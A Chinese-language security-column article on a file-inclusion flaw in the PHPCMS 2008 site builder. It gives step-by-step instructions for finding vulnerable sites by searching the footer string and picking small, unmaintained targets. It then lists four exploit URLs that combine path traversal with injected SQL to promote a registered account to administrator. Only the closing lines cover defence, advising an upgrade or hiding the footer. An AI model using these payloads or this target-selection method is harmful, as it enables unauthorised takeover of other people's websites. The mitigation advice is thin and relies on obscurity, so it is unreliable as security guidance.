过包含漏洞入侵网站
安全阵线
漏洞出处:PHPCMS 2008建站程序
漏洞危害:获取建站程序管理员权限
PHPCMS 2008是常见的一种建站程序,利用该建站程序的包含漏洞,黑客可以将普通用户提升为网站管理员,从而控制整个网站。
所谓包含漏洞其实就是文件有过滤不严的问题。这个问题在很多网站普遍存在。如何利用PHPCMS 2008的包含漏洞呢?方法如下:首先,以“Powered by PHPCMS 2008”为关键字进行搜索,可以找到很多使用PHPCMS 2008的网站,尽量挑选排名靠后的小网站,因为它们很少得到维护,漏洞一般没有被修复。
接着,在选定的目标网站中注册一个账号。需要注意的是,要想利用漏洞,必须使用纯数字的账号。注册完成后,登录网站,进入个人空间,点击“发短消息”链接,在该页面的URL中,末尾的“userid”参数后跟着的就是该账号的用户ID值。
然后输入四段代码:
代码1:http://www.***.com/php
cms 2008sp4/wap/index.php?act
ion=../../formguide/admin/include/
fields/datetime/field_add&sql=UP
DATE phpcms_member SET groupid=1 where userid=用户ID
代码2:http://www.***.com/php
cms 2008sp4/wap/index.php?act
ion=../../formguide/admin/include/
fields/datetime/field_add&sql=UP
DATE phpcms_member_cache SET groupid=1 where userid=用户ID
代码3:http://www.***.com/php
cms 2008sp4/wap/index.php?act
ion=../../formguide/admin/include/
fields/datetime/field_add&sql=INSERT INTO phpcms_admin (use
rid,username,allowmultilogin,alloweditpassword) values(用户ID,用户名,1,1)
代码4:http://www.***.com/php
cms 2008sp4/wap/index.php?ac
tion=../../formguide/admin/include/
fields/datetime/field_add&sql=INSERT INTO phpcms_admin_role (userid,roleid) values(用户ID,1)
代码执行后,黑客就拿到了PHPCMS 2008的管理员权限了,现在黑客就能登录网站的后台了(如图)。
防范方法很简单,将PHPCMS 2008版升级到最新的V9版即可。如果懒得升级,那就要修改网站底部的版权信息。因为黑客大部分都是通过“Powered by PHPCMS 2008”关键字来搜索目标的,修改版权信息后,黑客就搜索不到网站了。